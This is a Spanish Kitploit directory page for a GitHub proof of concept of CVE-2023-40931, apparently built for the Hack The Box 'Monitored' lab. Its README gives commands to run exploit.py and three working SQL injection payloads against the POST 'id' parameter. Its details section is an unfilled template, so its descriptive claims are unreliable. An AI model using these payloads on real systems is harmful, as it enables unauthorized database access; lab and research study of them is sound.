Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-40931-POC — Prueba de concepto de CVE-2023-40931 realizada para HTB MONITORED | Kitploit
Herramientas/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

Prueba de concepto de CVE-2023-40931 realizada para HTB MONITORED

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-40931 Prueba de Concepto (PoC) 🚨

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2023-40931, una vulnerabilidad de seguridad identificada en [software/sistema afectado]. El propósito de este repositorio es demostrar la vulnerabilidad únicamente con fines educativos y de investigación. 🛠️

Descargo de responsabilidad ⚠️

Este proyecto está destinado únicamente a fines educativos y pruebas autorizadas. El uso indebido de este código puede acarrear consecuencias legales. Los autores no se hacen responsables de ningún uso indebido o daño causado por este código. Obtenga siempre la autorización adecuada antes de probar cualquier sistema. 🔒

Detalles 📋

  • ID de CVE: CVE-2023-40931
  • Tipo de vulnerabilidad: [Tipo de vulnerabilidad, p. ej., Ejecución remota de código, Escalada de privilegios]
  • Software afectado: [Nombre y versión del software afectado]
  • Gravedad: [Nivel de gravedad, p. ej., Crítica, Alta] 🚩

Para obtener más información, consulte la entrada oficial de CVE: CVE-2023-40931. 🔗

Uso 🚀

  1. Clone el repositorio:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    El parámetro POST 'id' es vulnerable. Los siguientes payloads explotaron la vulnerabilidad con éxito:

    • Ciega basada en booleanos: Este payload utiliza una declaración condicional para determinar el valor de verdad de una consulta, lo que permite extraer datos mediante lógica booleana.

      • Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • Basada en errores: Este payload explota los mensajes de error de la base de datos para extraer información mediante la activación de errores específicos.

      • Payload: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • Ciega basada en tiempo: Este payload utiliza retardos de tiempo para inferir información observando el tiempo de respuesta del servidor.

      • Payload: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    Estos payloads demuestran la susceptibilidad de la vulnerabilidad a ataques de inyección SQL. Proceda con precaución y asegúrese de contar con la autorización adecuada antes de realizar pruebas. 🔒

  2. Siga las instrucciones del archivo exploit.py para ejecutar el PoC. 🧑‍💻

    Nota: Asegúrese de tener instaladas las dependencias requeridas. ✅

Descargar herramienta